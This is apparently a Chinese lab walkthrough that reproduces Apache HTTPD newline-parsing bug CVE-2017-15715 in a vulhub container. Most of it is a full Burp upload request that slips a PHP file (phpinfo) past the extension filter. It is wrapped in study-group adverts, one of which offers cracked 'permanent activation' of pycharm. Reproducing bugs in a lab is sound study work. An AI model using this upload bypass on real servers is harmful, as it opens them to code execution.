网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 环境
1.进入 vulhub 的 CVE-2017-15715
cd /usr/local/tools/vulhub/httpd/CVE-2017-15715
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep CVE-2017-15715
访问 8080 端口
漏洞利用
访问 8080 端口,上传一个 php 文件,提示报错
此时打开 burp 进行抓包拦截,写入 php 文件内容,以及 hex 出对 php 文件后缀进行修改
数据包如下
POST / HTTP/1.1
Host: 139.196.87.102:8080
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://139.196.87.102:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLeE8UKghjLbbkwTx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://139.196.87.102:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: -http-session-=6::http.session::a7c40927f24b51084890c6583a8c8442
Connection: close
------WebKitFormBoundaryLeE8UKghjLbbkwTx
Content-Disposition: form-data; name=“file”; filename=“test.php”
Content-Type: application/x-php
<?php phpinfo(); ?>------WebKitFormBoundaryLeE8UKghjLbbkwTx
Content-Disposition: form-data; name=“name”
test.php
------WebKitFormBoundaryLeE8UKghjLbbkwTx–
数据包转发成功
验证漏洞利用是否成功
最后
不知道你们用的什么环境,我一般都是用的Python3.6环境和pycharm解释器,没有软件,或者没有资料,没人解答问题,都可以免费领取(包括今天的代码),过几天我还会做个视频教程出来,有需要也可以领取~
给大家准备的学习资料包括但不限于:
Python 环境、pycharm编辑器/永久激活/翻译插件
python 零基础视频教程
Python 界面开发实战教程
Python 爬虫实战教程
Python 数据分析实战教程
python 游戏开发实战教程
Python 电子书100本
Python 学习路线规划
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!